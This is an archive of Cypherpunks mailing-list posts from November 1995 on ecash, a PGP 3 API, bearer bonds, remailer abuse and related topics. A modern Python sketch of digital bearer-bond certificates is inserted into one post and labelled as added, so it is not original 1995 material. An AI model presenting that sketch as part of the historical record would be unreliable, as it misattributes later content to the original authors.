From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 19 Nov 1995 19:33:24 +0800
To: cypherpunks@toad.com
Subject: ecash as pgp
Message-ID: <199511191118.DAA14424@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	This is really frustrating.

	I'm trying to figure out how to use this damn ecash software
to setup a prototype ecash-accepting remailer.

	For one thing, there's no documentation.

	Secondly, from what I can tell, it's like PGP. To integrate it
into other software you have to do all sorts of nasty output
parsing. why the hell can't it just produce nice, terse, informative,
UNIX-like output?

	it's late, i'm tired, I'm going to sleep.

	(the party was fun, btw, thanks to everyone who showed up.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cybie@cris.com (Greg Morgan)
Date: Sun, 19 Nov 1995 14:50:09 +0800
To: cypherpunks@toad.com
Subject: VB4 secure mail software
Message-ID: <199511190630.BAA13412@deathstar.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


To the guy who was interested in writing a secure mail program that
worked with MS Exchange in VB4, e-mail me...  I was also thinking of
working on something like that, we could probably work together on
this.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 19 Nov 1995 21:54:46 +0800
To: cypherpunks@toad.com
Subject: Real-life example of why National ID cards won't work
Message-ID: <Pine.SOL.3.91.951119083458.15541B@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
#Date: Fri, 17 Nov 95 16:18:55 PST
#From: medic@netvision.net.il
#To: shomronnews@felix.dircon.co.uk
#Subject: Update 755

SNS News Service  "Interior Ministry Scandal"
November 19, 1995..26 Cheshvan  5756..Number 755..Update from 
Israel ...

Following a report released by Yediot Achronot Newspaper, Interior 
Minister (Labor) Ehud Barak has ordered an immediate investigation 
into allegations of wrong-doing by senior Ministry officials.

The report states that falsified ID cards and other Ministry permits 
are being sold to Arabs. Among those mentioned in the newspaper 
story is Chaim Ben-Atar, the Director of the Ministry's East 
Jerusalem Office, a Member of Knesset, and past members of the 
Mossad and GSS (Shin Bet). 

The Yediot report also alleges that Police officials silenced 
investigations over the past two years (that may have prevented 
terrorist attacks) for the fear of revealing names of top officials 
involved in the Ministry false documentation scam. The 
investigations involved senior officers in the IDF Civil Administration, 
IDF officers, senior Ministry of the Interior officials and officials in 
the Jerusalem Municipality.  

Some of the allegations:
1) In the East Jerusalem Branch of the Ministry of the Interior, 
Arabs that are not entitled by law may still receive ID cards, travel 
permits to Jordan, and other official documentation in return for 
cash payments or "favors". 

2) Senior officials in the security service of the State have abused 
their connections with the east and west Jerusalem Ministry Offices, 
and have offered permits to travel abroad in return for cash 
payments. The permits were given to Arabs that would not be able 
to obtain them legally. 

3) Interior Ministry workers have received favors and cash payments 
from Arab and Jewish agents in return for issuing travel documents, 
ID cards and passports.

4) Chaim Ben-Atar, the Director of the East Jerusalem Interior 
Ministry Registration Office has provided five Arab residents of 
Gaza with ID cards stating they live in East Jerusalem. 

5)  Ben-Atar also employed an Arab woman during a four-year 
period whose brother is a "religious fanatic activist in East 
Jerusalem". The Arab woman who assisted Ben-Atar has access to 
highly classified information.  She was released from her position 
one year ago for "personal reasons."

6) During an investigation into wrong-doing by the past head of the 
Allenby Bridge crossing, information pointing to wrong-doing by 
other senior IDF officers and Jerusalem Municipality workers was 
uncovered as well. The Ministry chose not to pursue the 
investigation against them.  The cases against them were silenced 
by Interior Ministry officials.  (Yediot Achronot ..11/19..Page 5).

...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tom Bell" <BELL@odo.law.udayton.edu>
Date: Mon, 20 Nov 1995 00:57:00 +0800
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Anonymity and Intellectual Capital
Message-ID: <BDA7F31725@odo.law.udayton.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I've ranted about all this here and elsewhere, how falling semiconductor
> prices, public networks and strong cryptography beget the reemergence of
> bearer certificates, this time in digital form (of which ecash is only the
> prima facie example, the existence proof) and what I call, for lack of a
> better term, a "geodesic", instead of hierarchical, economy.

> Bob Hettinga

Agreed.  What's more, I'll make a similar claim about the legal 
system -- with the rise of alternate dispute resolution systems, it 
too appears to be moving toward a system where law issues less from 
state authorities and more from private ones.  Post's article brings 
out this point well.

As for terminology, I prefer "polycentric."  Originally coined (I 
believe) by Polanyi with regard to non-hierarchical societies, it 
works quite well in economic and legal contexts.  A polycentric 
system harbors overlapping authorities in free and open competition.

Tom W. Bell
Assistant Professor 
Law and Technology Program
UD Law School
bell@odo.law.udayton.edu

PGP fingerprint:
78 06 76 AC 32 38 A6 4C  B3 81 F4 1E 2E 27 AC 71





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "GORD JENKINS" <jenkins@fox.nstn.ca>
Date: Mon, 20 Nov 1995 01:50:21 +0800
To: cypherpunks@toad.com
Subject: JIBC Annoucement
Message-ID: <58085.jenkins@fox.nstn.ca>
MIME-Version: 1.0
Content-Type: text/plain



----- Forwarded message begins here -----
From: junhan zhang  <jzhang@ARRAYdev.com>
Thu, 9 Nov 1995 12:11:10 -0500 (EST)
To: gord@array1.arraydev.com
Subject: JIBC Annoucement

________________________________________________________________________

Journal of Internet Banking and Commerce

The goal of this publication is to inform executives, professionals,
entrepreneurs, government employees and other key players on principal
developments and trends in the rapidly evolving electronic commerce area all
over the World.  This free online Journal is a way to keep in touch, to
share information, and to establish business contacts (networking) in the
area of electronic commerce and banking on the Internet.

Journal of Internet Banking and Commerce (JIBC) is primarily devoted to
important announcements, original articles, guest columns, significant
feature presentations from other publications, as well as surveys, reviews,
and letters to the editor.  Technical discussions that belong to several
other specialized lists will be kept to the absolute minimum.

Our Journal will be issued no more often than two or three times a week,
limiting material to the absolute minimum.  We are definitely looking for
quality, not quantity.  Needless to say, we will be editing, filtering and,
where possible, summarizing, to provide our busy readers only with
substantial information. 

Join this site and learn the trends in electronic commerce.  We promise not
to get too "techie". Not too many fights but lots of good discussion.  We
will need your articles, your letters, your contributions and 
discussion.  

The Journal is maintained and published courtesy of ARRAY Developments of
Ottawa, Canada (http//www.ARRAYdev.com/).  The Publisher, Nahum Goldmann may
be reached at:
  Nahum.Goldmann@ARRAYdev.com.  
Or you can reach the editor and moderator, Gord Jenkins of JENKINS AND
ASSOCIATES INC with any questions, comments or insights at:
  Jenkins@fox.nstn.ca (http//www.infop.com/karoma), Tel. 613-723-1581, 
  FAX 613-723-8938.

Please note that the mailing address for subscribe/unsubscribe is 
 JIBC-request@ARRAYdev.com 
 ************ 
 
World Wide Web information about this mailing list is available via: 
  http://www.arraydev.com/commerce/JIBC/.  
Please send any questions on its maintenance to the list owner :
  <JIBC-admin@ARRAYdev.com>.
Note that ARRAY Development is neither responsible nor necessarily shares
opinions expressed on the list. 
     
This message is sent monthly to the JIBC list.   If mail sent to you cannot
be delivered successfully, your email address will be ruthlessly removed
from the mailing list to prevent bounces for senders.  If you believe you
have been dropped, you can check your subscription status by sending mail 
to: 
    majordomo@ARRAYdev.com 
  Write in the body of message (NOT Subject:) 
 JIBC Your_email_address
 
This command will confirm whether you are on the current list of 
subscribers. 
 
    To subscribe: 
        Send email to JIBC-request@ARRAYdev.com 
        Body of message (NOT Subject:)  subscribe 
    To unsubscribe: 
        Send mail to JIBC-request@ARRAYdev.com 
        Body of message (NOT Subject:)  unsubscribe 
    To contribute to the mailing list: 
        Send mail to JIBC@ARRAYdev.com 
     
  Notice the difference between the two email addresses for subscribing  
(JIBC-request) and posting (JIBC)! 
 
    Send other inquiries to owner JIBC-admin@ARRAYdev.com 
 
    To get a description of all valid commands: 
        Send mail to majordomo@ARRAYdev.com 
        Body of message (NOT Subject:) help 
 
    As our Journal is a moderated list, there is no "digest" facility. 
 ________________________________________________________________________
------ Forwarded message ends here ------
 --
 GORD JENKINS
e-mail  JENKINS@fox.nstn.ca
tel 613 794 6735
fax 613 723 8938




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 20 Nov 1995 02:59:32 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymity and Intellectual Capital
In-Reply-To: <Pine.3.89.9511182108.B25524-0100000@tesla.cc.uottawa.ca>
Message-ID: <BXqTeD51w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca writes:
> Barring escrow services, I don't see how contracts (or a lot of
> other laws) could be enforced against these entities when they can simply pop
> in and out of existence (unless they have some physical counterpart, like
> a storefront and merchandise. But then these are easily linkable to True
> Names, unlike software companies, financial services or any other part of
> the info economy.)
>
> The value of a reputation is not particularly high in lots of cases or is
> occasionally worth throwing over for a big one-time scam. (Pyramid scams
> for "reputable" banks)

I think this setup would be totally appropriate for the kinds of services or
merchandise where the buyer may determine at the time of payment whether the
product is what it's billed to be; and needs no warranty or service. In other
words, forget any implied warranty of merchantability and go back to Roman
Law's "caveat emptor".

E.g., if you buy an office chair with a 90-day money back guarantee, you have
90 days to discover defects and return it; you want to be able to get hold of
the seller if you have to. On the other hand, if you buy some shares of IBM,
once you're satisfied that these really are IBM shares and the other party can
sell them, I don't think you need to know anything more about the seller. In
fact, in the real stock market most investors go through 2 brokers and usually
have no idea who you're buying these shares from.

> Ps. I know I could probably look this up, but exactly what are bearer bonds?
> I frequently hear them mentioned when market anonymity and money laundering
> come up.

I haven't seen anyone respond, so I'll ramble on.

A bond in general is an instrument that you buy from an organization that's
trying to raise capital (e.g., a company or a municipality). For example, you
might buy for $600 a bond issued by some, who promises to pay you $50 twice a
year for the next 20 years, and then pay you another $1000 in 20 years (at
maturity). Thus, the organization that issues the bond is borrowing money from
the investor and then pays interest on it. There are slight variations, like
zero-coupon bonds, which don't make periodic payments, but pay the lump sum
at maturity. I heard that in Europe they have perpetual bonds, which never
mature. (When you buy bonds, you take certain risks: the issuer may default and
not make the promised payments; the interest rates may go up, so you would have
gotten better return in a CD; etc; but that's beside the point.)

Obviously, there's an aftermarket in bonds. An investor may want $700 now,
rather than $1000 in 20 years, so s/he sells the bond to another investor
(generally, the less time is left to maturity, the smaller the discount from
the par value). How does the organization that issued the bonds know who is
supposed to receive the periodic coupon payments?

In the past, many bonds were "bearer instruments". The owner of the bond had in
his or her physical possession a piece of paper entitling him to the periodic
payments, and transferred the piece of paper to the new owner when the bond was
sold. To collect the payments due the owner, someone had to present the piece
of paper to the bond issuer's agent. The agent would remove a physical coupon
from the piece of paper and give the bearer some money.

(Think of a movie ticket -- its bearer is admitted to see a movie and doesn't
have to identify himself beyond presenting the ticket.)

The problem with this system, from the point of view of the Internal Revenue
Service and other U.S.Gov't agencies, was that the bearer could be anonymous
and did not have to identify his/herself beyond presenting the piece of paper
entitling him/her to the payment. Thus, they could in principle not declare
these payments on their income tax return and the IRS would have a tough time
tracking them down.

So, about 20 or so years ago, the U.S.Congress required bond issuers to tell
the IRS who received their bond payments. No more anonymity, no more bearer
bonds. (My papers are in the office, so this could in fact be more draconian --
U.S. people prohibited from owning bearer bonds issued by European companies.)

In comparison, if you own stock in a company, your stock certificate is never a
bearer instrument. The corporation knows its shareholders of record, sends them
their dividends, and tells the IRS whom it sent the dividends. When you have an
interest-bearing account at a bank, a SS# is associated with it (or else you
pay penalties) and the IRS is informed about any interest you've earned.

The fact that bearer bonds were outlawed suggests that if and when new ways are
invented to conduct financial transactions that are conducive to tax evasion
(e.g., using anonymous electronic payments), they too may become outlawed.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 20 Nov 1995 08:07:54 +0800
To: warlord@MIT.EDU (Derek Atkins)
Subject: Re: ecash as pgp
In-Reply-To: <199511192339.PAA07631@tess-turbo.mit.edu>
Message-ID: <199511192338.PAA13806@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Cool! I'm really glad you're working in this. Now if only
digicash would release libecash.a, we'd have the infrastructure for
some killer apps.

> 
> > 	Secondly, from what I can tell, it's like PGP. To integrate it
> > into other software you have to do all sorts of nasty output
> > parsing. why the hell can't it just produce nice, terse, informative,
> > UNIX-like output?
> 
> This will change with PGP 3.  There is a very nice, easy API for PGP 3
> which I have been working on for over the last month.  In fact, the
> main processing code is done.  After Thanksgiving I will be working on
> an API document which explains the design and implementation of the
> API.
> 
> IMHO, the API is REALLY EASY to use -- I have a PGP encryption program
> which has all of the main functionality of PGP w.r.t. creating messages,
> and the program is only 250 lines of commented C code.
> 
> The current work is far from complete, but it is getting close!  It
> should make integrating PGP into other programs very simple -- just
> link against libpgp.a. :)
> 
> Enjoy!
> 
> -derek
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 20 Nov 1995 04:58:45 +0800
To: www-buyinfo@allegra.att.com
Subject: e$: What's a digital bearer bond?
Message-ID: <v02120d00acd4d487906b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>Ps. I know I could probably look this up, but exactly what are bearer bonds?
>I frequently hear them mentioned when market anonymity and money laundering
>come up.

It's the little questions which take the longest to answer...

I wrote something here in cypherpunks this year called "The Book Entry /
Certificate Distinction", which you might want to check out in the
archives.

Bearer bonds and bearer certificates (like cash) belong to the bearer. To
be flip, possession is 100% of the law with a bearer bond. Bearer bonds can
be stolen, but they aren't registered anywhere, which makes them useful for
anonymity. All along the bottom of a bearer bond are little squares called
coupons, which you cut out periodically and mail in to the issuer, and
they'll send you back an interest check for that period's interest. Lots of
financial phrases come from bearer bonds. When a bond trader talks about a
bond's interest rate, she may use the word "coupon" interchangeably, as in,
"That bond has a 7% coupon." Meaning, it pays 7% interest per year. Then
there's the phrase "clipping coupons", meaning someone is retired or
independently wealthy and living on their bond interest. Every month the
interest on one bond or other would come due, the coupons clipped and sent
in to the bond's issuer in return for an interest check.

Most securities these days are registered to the owner somewhere, at a
trustee, at the issuer, at a clearinghouse, or some combination of all. In
fact, most securities these days don't exist in physical form at all and
exist only on the books at clearinghouses and brokerages. This is why your
stock broker squalls about "physical delivery" when you ask for a
certificate. About a year ago, we talked about the Depository Trust
Company, the clearing house for the New York Stock Exchange. They have
entire issues there consisting of a single piece of paper in the
clearinghouse vault which are traded entirely on a book entry basis, that
is, only accounting entries are swapped when these securities change hands.

There are several reasons for this. The putative reason is that as taxing
authorities, like the Internal Revenue Service, have relied increasingly on
various cash-flow taxes like the income tax for their revenue, they have
slowly regulated or legislated bearer bonds out of existence in favor of
registered, and more to the point, book-entry securities.

However, like everything else, law and regulation is really a creature of
technology, and the technological reason that book-entry and consequently
registered certificates are popular is because they're cheaper to handle
locked down in a vault in a clearing house somewhere with the ownership
changing hands by changing offsetting accounting entries at the buyer,
seller, and clearinghouse.

This is a direct consequence of financial systems organized on top of
hierarchical communications networks, which was how all communication
networks were organized before automated switching, and, more to the point,
microprocessor switching made them more and more geodesic in structure. You
might want to check the archives for more of my rants here on that subject.

The thing about digital certificates, of which ecash is only the camel's
nose in the tent, is that while electronic, they're actual bearer
certificates. You get a lot of great non sequiturs when you talk about
them. "Digital bearer certificates", when you can't actually touch them to
"hold" them, Electronic "physical" delivery, and the like.

So, with a digital bearer bond, you would have in effect a bundle of
digital certificates. One would be for the principal and would be good for
the repayment of that principal on the date the bond was called or the
redemption date, however the bond offering is written. The other
certificates would represent coupons, one for each interest period for the
life of the bond.

These digital certificates, in combination with increasingly geodesic networks
enabled by exponentially falling microprocessor prices and strong
cryptography, theoretically allow secure, point-to-point trading of any
security of any amount with instantaneous clearing and cash settlement.

The current hierarchical capital market model, with brokers, "wholesalers",
and central exchanges has been collapsing for decades since the advent of
electronic trading systems (glorified computer bulletin boards, really)
like NASDAQ.  With the coming of digital certificate technology on public
networks, these markets will be "surfacted" into smaller and smaller
concentrations of information and capital.

I have no idea what markets will look like when we "return" to things like
digital bearer bonds, but there's a prima facie example now on the web as
we speak. This week Mark Grant just upgraded his Electronic Cash Market
(ecm)-based cyberbuck (c$) webpage "trading post", so that it will take the
new Mark Twain ecash. That means that it will be possible to trade old
Digicash beta-certificate c$, which sold for 5 cents US per c$, and
instantaneously clear and settle them for Mark Twain ecash on-line. No
checks have to be sent between trading parties to buy these certificates
anymore, which should lower transaction costs significantly, not to mention
the float on the money while the trade settled.

It was curious that people were buying these things to begin with, as they
had no value at all except their uniqueness, anonymous electronic
transmissibility, and a promise from Digicash BV to issue only a million of
them.  Yet now, with the market made infinitely more liquid with the
introduction of real-time cash settlement, things will get, as Alice said,
"curiouser and curiouser". Digicash still has some large number of these
things in the "treasury" unissued. I believe these original beta-test
certificates have both payee and payor anonymity, especially if traded
offline, which has been how they've been traded through the ecm.

More fun with numbers.

Cheers,
Bob Hettinga







-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<
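
The bundle described in the message above, as an added sketch that is not part of the original post or of any Digicash software: one principal certificate plus one coupon certificate per interest period, each paid once to whoever presents it. The class, field names and sample values are hypothetical, and an HMAC that only the issuer can check stands in for the issuer's signature.

```python
# Added illustration (not from the original post): a digital bearer bond
# modelled as a bundle of bearer certificates, one for the principal and one
# per coupon period. All names and values here are hypothetical.
import hashlib
import hmac
import json
import secrets
from datetime import date


class Issuer:
    """Mints certificates and pays whoever presents a valid, unspent one."""

    def __init__(self, key=None):
        # Assumption: an issuer-only HMAC key stands in for a real signature.
        self._key = key or secrets.token_bytes(32)
        self._redeemed = set()  # serial numbers that have already been paid

    def _tag(self, body):
        # Canonical JSON so the same fields always authenticate the same way.
        msg = json.dumps(body, sort_keys=True, separators=(",", ":"))
        return hmac.new(self._key, msg.encode(), hashlib.sha256).hexdigest()

    def _mint(self, bond_id, kind, amount_cents, due):
        # Note what is absent: no owner field. Possession is the entitlement.
        body = {
            "bond": bond_id,
            "kind": kind,
            "amount_cents": amount_cents,
            "due": due.isoformat(),
            "serial": secrets.token_hex(16),
        }
        return {"body": body, "tag": self._tag(body)}

    def issue_bond(self, bond_id, principal_cents, coupon_cents,
                   coupon_dates, maturity):
        """Return the bundle: one coupon per period, then the principal."""
        bundle = [self._mint(bond_id, "coupon", coupon_cents, d)
                  for d in coupon_dates]
        bundle.append(self._mint(bond_id, "principal", principal_cents,
                                 maturity))
        return bundle

    def redeem(self, cert, today):
        """Pay the bearer once; never ask who the bearer is."""
        body = cert.get("body") if isinstance(cert, dict) else None
        tag = cert.get("tag") if isinstance(cert, dict) else None
        if not isinstance(body, dict) or not isinstance(tag, str):
            return (False, "malformed")
        try:
            expected = self._tag(body)
        except (TypeError, ValueError):
            return (False, "malformed")
        # Constant-time comparison of the authentication tags.
        if not hmac.compare_digest(expected.encode(), tag.encode()):
            return (False, "forged or altered")
        if date.fromisoformat(body["due"]) > today:
            return (False, "not yet due")
        # A digital certificate copies perfectly, so the issuer's record of
        # spent serials is the only thing that stops double redemption.
        if body["serial"] in self._redeemed:
            return (False, "already redeemed")
        self._redeemed.add(body["serial"])
        return (True, body["amount_cents"])


def demo():
    """Run the constructed scenario and return each redemption result."""
    issuer = Issuer(key=b"constructed demo key, not a secret")
    coupon_dates = [date(1996, 5, 20), date(1996, 11, 20),
                    date(1997, 5, 20), date(1997, 11, 20)]
    bundle = issuer.issue_bond("DEMO-BOND", 100_000, 5_000,
                               coupon_dates, maturity=date(1997, 11, 20))
    first_coupon, principal = bundle[0], bundle[-1]
    copied = json.loads(json.dumps(first_coupon))   # a bit-for-bit copy
    altered = json.loads(json.dumps(bundle[1]))
    altered["body"]["amount_cents"] = 500_000       # bearer edits the amount
    today = date(1996, 12, 1)
    return {
        "certificates": len(bundle),
        "first presentation": issuer.redeem(first_coupon, today),
        "copy presented later": issuer.redeem(copied, today),
        "altered amount": issuer.redeem(altered, today),
        "principal before maturity": issuer.redeem(principal, today),
        "principal at maturity": issuer.redeem(principal, date(1997, 11, 20)),
    }


if __name__ == "__main__":
    for step, result in demo().items():
        print(f"{step}: {result}")
```

Because only the issuer holds the HMAC key, a buyer in this sketch cannot check a certificate without presenting it to the issuer; that limitation belongs to the stand-in, not to the scheme the message describes.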






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 20 Nov 1995 07:59:06 +0800
To: sameer <sameer@c2.org>
Subject: Re: ecash as pgp
In-Reply-To: <199511191118.DAA14424@infinity.c2.org>
Message-ID: <199511192339.PAA07631@tess-turbo.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 	Secondly, from what I can tell, it's like PGP. To integrate it
> into other software you have to do all sorts of nasty output
> parsing. why the hell can't it just produce nice, terse, informative,
> UNIX-like output?

This will change with PGP 3.  There is a very nice, easy API for PGP 3
which I have been working on for over the last month.  In fact, the
main processing code is done.  After Thanksgiving I will be working on
an API document which explains the design and implementation of the
API.

IMHO, the API is REALLY EASY to use -- I have a PGP encryption program
which has all of the main functionality of PGP w.r.t. creating messages,
and the program is only 250 lines of commented C code.

The current work is far from complete, but it is getting close!  It
should make integrating PGP into other programs very simple -- just
link against libpgp.a. :)

Enjoy!

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 20 Nov 1995 08:09:09 +0800
To: Raph Levien <raph@c2.org>
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <199511190419.UAA15156@infinity.c2.org>
Message-ID: <199511192347.PAA07661@tess-turbo.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> MIME Object Security Services. It's a technically superior alternative
> to PGP, but one with an uncertain future. It's not being actively
> developed by anyone other than TIS, and their TISMOSS prototype
> implementation is far from being generally usable.

What do you mean by "technically superior"?  What technical merits
does MOSS have over PGP?  It does have a better protocol with which to
integrate it into mailers, but it is only a transmission protocol, not
a security mechanism change.  Worse, MOSS uses X.509, which requires a
lot of overhead for certificates.

On the other hand, the MIME-PGP protocol can provide the same
integration functionality as MOSS and still allow the use of the
simple PGP certification structure that already exists.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Mon, 20 Nov 1995 13:24:08 +0800
To: "'cypherpunks@toad.com>
Subject: Visual Basic 4.0 encryption prog.
Message-ID: <01BAB6A0.6A583C20@king1-12.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


	I just scored a copy of visual basic 4.0 and I was wondering how feasible it would be to write a program for Window$ 95 that would use RSA or IDEA and the Win95 exchange interface. I plan on buying Applied Cryptography probably on Fri. when I get paid.
	My requirements/goals are: 100% compatibility with M$ Exchange, ease of use (Point & Click/ drag & drop) and last but not least, STRONG public key encryption using "off-the-shelf" code. 
	So my ??? Is this: Is it possible? Or should I just go out and buy a C++ compiler.
I don't really care about ITAR or any of that other BS, I just won't put MY name on it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@taussky.cs.colorado.edu>
Date: Mon, 20 Nov 1995 08:35:40 +0800
To: Derek Atkins <warlord@mit.edu>
Subject: Re: ecash as pgp
In-Reply-To: <199511192339.PAA07631@tess-turbo.mit.edu>
Message-ID: <199511200021.RAA09388@taussky.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> This will change with PGP 3.  There is a very nice, easy API for PGP 3
> which I have been working on for over the last month.  In fact, the
> main processing code is done.  After Thanksgiving I will be working on
> an API document which explains the design and implementation of the
> API.
> 
> IMHO, the API is REALLY EASY to use -- I have a PGP encryption program
> which has all of the main functionality of PGP w.r.t. creating messages,
> and the program is only 250 lines of commented C code.
> 
> The current work is far from complete, but it is getting close!  It
> should make integrating PGP into other programs very simple -- just
> link against libpgp.a. :)


This is SUCH good news!  May your coding be swift and sure.  Let no
bug delay that wonderful day of public distribution.


Regards,

Bryce



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Tue, 21 Nov 1995 01:21:52 +0800
To: remailer-operators@c2.org
Subject: remailer abuse
Message-ID: <199511200127.AA17430@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


Remailers exist (at least mine does) to make possible the dissemination of
unpopular views. "Unpopular" depends on context; so does "abuse". The line
between "unpopular" and "abuse" is difficult to draw.

On the one hand, the recent "Mr. Pedophile" message seemed intended to make
the recipient uncomfortable or offended probably because of illegitimate
reasons (purportedly, pedophilia). Other messages which cause complaints seem
to be responses to something that the "victim" has done or said somewhere
else. It's tempting to say that a message which lays out in logical fashion
coherent arguments explaining why the "victim's" original message is wrong is
likely to cause discomfort or embarrassment but is legitimate, while a message
which says, to quote from a complaint message I received this weekend, 
"Fuck you asshole. I hope you choke on your son's sperm." isn't legitimate
even though it may also cause discomfort or embarrassment. So I guess it's 
not so much a message's effect upon its recipient (or its intended effect)
which is legitimate or illegitimate as it is the message's means of doing so.
And that seems really tough to judge, where a remailer operator doesn't
know the context in which a message is sent.

(I do think it's possible that the "Mr. Pedophile" message was sent by another
child or teenager intending to torment the target, not by an actual 
pedophile. It's possible that the sender was the target himself. It's also
possible that the sender was an actual pedophile or a child-hostile adult, 
but that's not the only plausible explanation. People do strange, strange
stuff.)

In a situation where person A uses system X to send messages to person B who
uses system Y, I'm not sure what B can expect from the system operator of
system X. (I'm thinking about net custom here, not law.) If A wants to send
messages to B, but B doesn't want to receive them, should A be forced to
stop sending? Does X have an obligation to make A stop? Does X have an
obligation to modify his system such that messages from A to B are 
automagically suppressed? Does X have an obligation to refuse service to A
(and forego payment for service from A) if A won't stop sending to B? 
Is the answer different if B doesn't want the messages because they 
(are likely to) contain profanity? or because they are from a person of the
wrong religion? or because they're hostile or argumentative? 

As a first response I'm likely to say that if A knows (or should know, or
can guess and be pretty certain of the result) that B doesn't want to get a
particular message, A shouldn't send it. But then I realize that there are a
number of exceptions - what about if A's message to B is in response to a 
spam or otherwise inappropriate message from B? what about where B owes A
money? or if B has said something ridiculous or stupid and A is writing to
correct B? I think that there wouldn't be many inappropriate posts sent to
the C-punks list, for example, if everyone who thought a post was
inappropriate (not just factually arguable, or uninteresting) sent a message
to that effect; the impact of just a few hundred such messages in reply to
a single message would likely be burdensome enough to make the sender think
twice before sending again. But that inconvenience is anticipated by (and
motivates) the senders of those hundreds of messages. I still don't think
it's wrong to send the messages.

I guess my point is that eliminating "abuse" is pretty much impossible 
because abuse is in the eye of the beholder. I don't think we need to 
rely on the mercy or good graces of the net at large, though - remailers
will likely prove to be as difficult to eliminate as spammers have been.
The net is too big to be centrally policed, and individual providers often
have an incentive to tolerate behavior otherwise frowned upon because
they're being paid to do so. (and if they begin content filtering they
may lose any sort of quasi-common-carrier status they might enjoy now,
viz _Cubby v. Compuserve_, etc.) Even if the United States adopts rules
requiring messages be identified as to the sender, it won't be possible to
eliminate overseas remailers - and I imagine that folks would just start up
pseudonymous remailers. (I've worked on some prototype code and will
deploy a pseudonymous remailer - where people get names like 
"fjones@pseudo.goldenbear.com <Frank Jones>" instead of
"an12345@pseudo.goldenbear.com <Anonymous Sender>", in order to divert or
confuse anti-anonymous policies or programs.)

I think adopting a submissive or apologetic stance with respect to the 
operation of a remailer is a mistake. What we do is protected by the First
amendment, supports a 200+ year tradition of anonymous political speech in
America, provides a valuable service to a worldwide community, and can help
avoid the very abuse they are accused of facilitating. The child who was the
target of the "Mr. Pedophile" message(s) should have been taught how to use
remailers and how to maintain his privacy on the net so that, if he really
is the victim of some sort of random child stalker, it won't happen again.
There's no reason why any child should post to the net under their real name,
or why their messages should be traceable to their physical bodies. If we're
concerned about protecting kids from bad people who might reach them via the
net, we need to teach kids how to send untraceable and unreplyable messages;
how to send messages and do business on the net without allowing hostile
or unscrupulous people to track them down; and how to make good choices 
about revealing personal information only to people who have a good reason
to know it.

People who are the targets of abusive messages or are concerned about
abusive messages are some of the people who need remailers and need 
pro-privacy network tools the most. Giving in to a knee-jerk anti-privacy
reaction only reinforces the erroneous notion that security is created
by an enforced lack of privacy.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Tue, 21 Nov 1995 01:18:23 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <199511192347.PAA07661@tess-turbo.mit.edu>
Message-ID: <Pine.SUN.3.91.951119172235.23425B-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 19 Nov 1995, Derek Atkins wrote:

> What do you mean by "technically superior"?  What technical merits
> does MOSS have over PGP?  It does have a better protocol with which to
> integrate it into mailers, but it is only a transmission protocol, not
